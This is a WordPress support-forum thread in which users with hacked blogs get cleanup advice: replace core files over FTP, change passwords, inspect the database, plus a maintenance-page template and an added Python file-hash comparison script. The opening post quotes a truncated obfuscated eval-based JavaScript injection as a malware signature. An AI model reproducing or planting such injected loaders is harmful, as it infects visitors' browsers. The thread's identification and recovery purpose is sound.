WordPress.org

My blog is hacked and with malware!

  • sinankurt

    @sinankurt

    Hello,

    I am from Germany, so sorry for my bad English.

    I actually saw on Google Chrome that my WordPress blog (www.quartel.de) includes malware. I did everything to remove that malware, but I actually don't know how.

    I downloaded my whole WordPress content with FileZilla, but I don't know how and where to search for the viruses. Google says that it should look like this:

    <script>var s=new String();try{document.getElementById(‘t3v2562v3r3’).innerHTML}catch(q){r=1;c=String;}if(r&&document.createTextNode)o=2;e=window.eval;m=Array(4.5*o,18/o,52.5*o,204/o,16*o,

    How can I find this malware?

Viewing 15 replies - 1 through 15 (of 22 total)
  • Don’t try to search, replace all the wp files including plugins and theme files with a fresh copy, also change your wp password and also change it if used anywhere else (this is often how they get your wp password as it’s the same as your hacked commercial account using the same email address and password)…you should take this time to update to the latest versions each plugin/theme and wp..if your database was compromised (the offending code may be in a table in the database), change the password (and make sure you update wp-config). If you cannot login to wordpress as admin, rename the index.php file to index.html and try then…a new index.php file is created…this index.php file is in the root of your theme. The likely location for the offending code is in the wp_options table…manually editing the database is not for a novice. Good luck!

    sinankurt

    @sinankurt

    Thanks for the fast answer.

    I can normally log in to my blog as admin and use it, too. But I don't know what you mean with replace? I mean then are all my things in the past deleted, not? That would be really bad.

    I mean to use your ftp client to manually replace all wp files.

    WP settings are kept in the database, if your db is not what was hacked, you will be OK. You may lose any customizations done directly to wp files, like custom css, etc…these can be simply re-edited using the files you downloaded as a ref…if you made the changes, you should know what they are.

    rballin

    @rballin

    My site got hacked as well. Should I uninstall WP and then re-install it?

    Yes, that’s to make sure no files are infected with bad code. Please note to make sure to keep a copy of everything including a full backup of your database. Some say you can leave the wp-contents folder as is, but I am not convinced this folder cannot contain a hacked file as it is just as vulnerable as any one folder in wp to be hacked. I would do this manually via ftp as the admin scripts could be corrupt. And change those passwords you use.

    rballin

    @rballin

    I have a small issue…my hard drive crashed a few months ago and I didn’t save the theme I downloaded and paid for…is there any way I can save that before I delete everything?

    You can connect to your site with FTP and download the theme files – actually to properly back it up you should do this often, then back that up!

    sinankurt

    @sinankurt

    Yes, I downloaded all files from my blog for now. But what to do in the next step? Please help me, I don’t want that my blog gets blacklisted.

    rballin

    @rballin

    Ok so I deleted all the WP files then I uploaded a backup that I did this afternoon and my site looks as bare as the day I started it…what am I doing wrong??

    Before proceeding with a manual install/updates, it is important to review and understand all the related topics here:

    http://codex.wordpress.org/Installing_WordPress#Detailed_Instructions

    First you need to take inventory, then download what you need. Review the link above and make sure you fully understand it, then:

    Write down a list of the installed plugins and the theme. Each as they appear in the appropriate wp admin panel section will have links to the author and WordPress page for them. After confirming compatibility with the current WordPress version, download the latest version, saving each to a common location. Once you have gathered the files you need, they need to be extracted. Once extracted, each will have a default folder name such as mythemev1.x, it is the whole folder inside that you need.

    Download WP 3.2.1 (make sure your host supports this version, it requires certain version of supporting programs/modules etc, like php). Extract files.

    The file sample-wp-config.php needs to be renamed to just wp-config and it needs to have the same data as your current wp-config.php (you can just copy the wp-config.php file but make sure it’s correct and does not have errant code). This step is very important to do right.

    Verify that your .htaccess file or web.config file (IIS7) is correct.

    Create a new folder called BlogNewFiles (or whatever). Move the wp files to that folder. Navigate to the wp-contents folder, then plugins and then theme folders and put the plugins and theme folders you extracted into them accordingly.

    Log back into site as admin and deactivate your theme and all plugins. This is very important to have the next steps work right.

    Next, open Notepad (ASCII text editor – NOT Word or other rich text editor) and paste this in and save the file as “.maintenance” (dot first, no extension, or quotes):

    <?php $upgrading = time(); ?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
    <title>Maintenance</title>
    <style type="text/css">
    .style1 {
    	font-size: x-large;
    }
    .style2 {
    	font-size: large;
    }
    </style>
    </head>
    <body style="background-color: #008080">
    <h1>Briefly unavailable for scheduled maintenance. Check back soon.</h1>
    <h2>This site is currently in Maintenance Mode. What, you say? Occasionally,
    Wordpress needs to have core files updated, plug-ins updated, and then a short period
    for testing is required. Look back soon.</h2>
    <h2>Thanks!</h2>
    </body>
    </html>
    <?php die(); ?>

    (Above is an example and can be styled as you choose)

    Using cPanel or phpMyAdmin (see your web host documentation on this), make sure you are quite clear on the instructions to back up your database, then do so.

    Back to FTP now, (make really sure you have ALL your files downloaded, both old and new), then rename the folders:

    wp-admin
    wp-contents and
    wp-includes

    to

    xxx-wp-admin
    xxx-wp-contents and
    xxx-wp-includes

    (this saves the files on the servers…if your upgrade fails, remove the new files and rename those back)

    Then upload your new files and after remove the .maintenance file (or rename).

    Log into site, activate your theme, activate your plugins, and review the site for style and functionality.

    If it was files that were hacked, this will fix it, if not then work needs to be done on the database (which may again in turn corrupt your files, so this part may have to be redone too).

    Please reply with any questions and especially if this helped.
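Added example (not part of the reply above, and not WordPress's own tooling): the procedure leaves two local folders, the files downloaded from the server and the freshly extracted copies, and this Python sketch hashes both and lists what differs so altered or unexpected files can be reviewed before anything is restored. The folder layout and the sample files it builds are constructed for illustration.

```python
import hashlib
import os
import tempfile

def file_hashes(root):
    """Map each file's path relative to root -> SHA-256 of its contents."""
    hashes = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                hashes[rel] = hashlib.sha256(fh.read()).hexdigest()
    return hashes

def compare_trees(downloaded, fresh):
    """Compare the copy pulled from the server with freshly extracted files."""
    old, new = file_hashes(downloaded), file_hashes(fresh)
    return {
        # Same path, different bytes: a customization or injected code.
        "modified": sorted(p for p in old if p in new and old[p] != new[p]),
        # On the server but not in the fresh copy: uploads, config, or planted files.
        "extra": sorted(p for p in old if p not in new),
    }

def build_sample():
    """Constructed sample trees (not real WordPress files) for a dry run."""
    base = tempfile.mkdtemp()
    files = {
        "fresh/index.php": "<?php // core\n",
        "fresh/wp-includes/load.php": "<?php // loader\n",
        "site/index.php": "<?php // core\n<script>/* appended */</script>\n",
        "site/wp-includes/load.php": "<?php // loader\n",
        "site/wp-content/uploads/x.php": "<?php // unexpected\n",
    }
    for rel, body in files.items():
        path = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", newline="") as fh:
            fh.write(body)
    return os.path.join(base, "site"), os.path.join(base, "fresh")

if __name__ == "__main__":
    report = compare_trees(*build_sample())
    for kind, paths in report.items():
        for p in paths:
            print(kind, p)
```

Compare against the same WordPress, theme and plugin versions that were installed, and download over FTP in binary mode, since ASCII-mode transfers rewrite line endings and make every text file show up as modified.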

    @rballin, did you upload the files in the root also, following the instructions above?

    rballin

    @rballin

    I honestly don’t understand any of this and I feel so screwed because I am now worse off than I was before.

    @rballin,

    Contact your webhost and see if they have any ‘snapshots’ of your files and database that precludes the problem. If not, you may need to hire someone.

    sinankurt

    @sinankurt

    I don’t understand, too. I want to hire someone from sucuri, but I don’t have a credit card. I am so demoralized, I don’t know what to do now. I think my blog gets blacklisted, and do one….

    I would give somebody from here my wp password and my FTP password if he/she could fix that problem. Please, I am in a so big problem 🙁

    rballin

    @rballin

    @sinankurt I ended up calling my web host and had them reinstall my site from a few days before I got hacked. They were able to locate the malware for me and deleted everything. I had Google re-index it and everything is fine now. I would suggest doing that if you can’t afford to pay someone to help you.

  • The topic ‘My blog is hacked and with malware!’ is closed to new replies.